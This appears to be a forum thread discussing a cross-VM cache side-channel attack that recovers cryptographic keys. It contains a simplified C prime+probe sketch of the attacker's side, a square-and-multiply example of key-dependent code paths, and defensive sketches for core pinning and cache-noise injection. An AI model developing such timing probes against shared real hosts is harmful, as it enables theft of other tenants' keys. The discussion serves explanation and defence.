The attacking VM fills the cache with its own data so that the target VM, while processing a cryptographic key, overwrites some of it. By observing which parts of the cache were evicted, the attacking VM learns about the key in use.
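In other words, the classic prime+probe pattern. A toy sketch of the attacker's side, just to make the mechanics concrete (the cache size, line size, miss threshold and the simple linear indexing are assumptions for illustration, not what the researchers actually did; a real attack has to deal with cache sets, slices and noise):

```c
/* Minimal prime+probe sketch (x86, gcc). Illustrative only: sizes and
 * the miss threshold are assumed, not taken from the actual attack. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h>   /* __rdtsc, _mm_mfence */

#define CACHE_SIZE (256 * 1024)  /* assumed cache size */
#define LINE_SIZE  64            /* assumed cache line size */
#define NLINES     (CACHE_SIZE / LINE_SIZE)

static volatile uint8_t buf[CACHE_SIZE];

/* Prime: pull every line of our buffer into the cache. */
static void prime(void) {
    for (size_t i = 0; i < CACHE_SIZE; i += LINE_SIZE)
        (void)buf[i];
}

/* Probe: time each line; a slow access means the victim evicted it. */
static void probe(uint64_t *lat) {
    for (size_t i = 0; i < NLINES; i++) {
        _mm_mfence();
        uint64_t t0 = __rdtsc();
        (void)buf[i * LINE_SIZE];
        _mm_mfence();
        lat[i] = __rdtsc() - t0;
    }
}

int main(void) {
    uint64_t lat[NLINES];
    prime();
    /* ...here the victim VM would run its key-dependent code... */
    probe(lat);
    for (size_t i = 0; i < NLINES; i++)
        if (lat[i] > 200)                /* assumed miss threshold */
            printf("line %zu evicted (%llu cycles)\n",
                   i, (unsigned long long)lat[i]);
    return 0;
}
```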

Clever bastards. And pretty undetectable, too.

In the real world, the way to avoid this kind of exploit headache is for administrators to take countermeasures against the leakage. One is to use a separate, "air-gapped" computer for high-security tasks.

In other words, do not use VM technology. The whole point of VMs is supposedly that you don't need an air gap.

Couldn't this be addressed by simply locking each VM to a separate core and deactivating the cache during crypto calls? I don't know if current architectures support this, but old processors had instructions that operated strictly out of registers.
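For the core-locking half of that, the Linux mechanism is sched_setaffinity(); a hypervisor would pin each vCPU thread the same way (e.g. libvirt's vcpupin). A minimal sketch, with an arbitrary core number:

```c
/* Sketch of pinning the calling process to one core on Linux. The
 * core number is arbitrary; a hypervisor would pin vCPU threads. */
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>

int main(void) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(2, &set);                    /* pin to core 2 (arbitrary) */
    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
        perror("sched_setaffinity");
        return 1;
    }
    printf("pinned to core 2\n");
    /* Note: pinning alone doesn't close the channel if the cores
     * still share a last-level cache. */
    return 0;
}
```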

Couldn't this be addressed by simply locking each VM to a separate core and deactivating the cache during crypto calls?

Which would pretty much defeat the idea of virtualisation in the first place. The point of it is to have separate stuff running concurrently on the same hardware. The software you run doesn't know it's running in a VM - and the VM doesn't really know what is running inside it (i.e. it can't really tell on whose behalf it's putting stuff in the cache).

Then have the host overwrite some of the cache memory at random intervals, to add noise to the system.
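Very roughly, that noise injection could look something like this on the host side (the buffer size, lines-per-burst and sleep intervals are made-up numbers, and a real hypervisor would do this per physical cache rather than as an ordinary process):

```c
/* Rough sketch of the "add noise" idea: touch random cache lines at
 * random intervals so the attacker's probe sees evictions it can't
 * attribute to the victim. All parameters are assumptions. */
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

#define NOISE_SIZE (4 * 1024 * 1024)   /* assumed: spans the shared cache */
#define LINE_SIZE  64

static volatile uint8_t noise[NOISE_SIZE];

int main(void) {
    srand((unsigned)time(NULL));
    for (;;) {
        /* Touch a burst of random lines. */
        for (int i = 0; i < 512; i++) {
            size_t line = (size_t)rand() % (NOISE_SIZE / LINE_SIZE);
            (void)noise[line * LINE_SIZE];
        }
        usleep(rand() % 900 + 100);    /* random 0.1-1 ms pause */
    }
    return 0;
}
```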

The attacker relies on knowing the algorithm the target is using, and on the code path being dependent on the key. Deduce the path and you have the key. Of course, you have to have the system prioritize scheduling for IPIs. Nice work, but a very special case. Without IPI priority, no result.
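The "code path dependent on the key" part is easiest to see in textbook square-and-multiply exponentiation: the multiply step only runs for the 1-bits of the exponent, so which cache lines get touched follows the key. A toy version in plain 64-bit arithmetic (real crypto uses big integers and, these days, constant-time code):

```c
/* Textbook square-and-multiply: the multiply runs only for 1-bits of
 * the exponent, so its memory accesses leak the key bits. */
#include <stdint.h>
#include <stdio.h>

static uint64_t modexp(uint64_t base, uint64_t exp, uint64_t mod) {
    uint64_t result = 1;
    base %= mod;
    for (int bit = 63; bit >= 0; bit--) {
        result = (result * result) % mod;    /* always: square */
        if ((exp >> bit) & 1)                /* key-dependent branch */
            result = (result * base) % mod;  /* only for 1-bits */
    }
    return result;
}

int main(void) {
    /* 5^117 mod 1000003, arbitrary values just to show it runs. */
    printf("%llu\n", (unsigned long long)modexp(5, 117, 1000003));
    return 0;
}
```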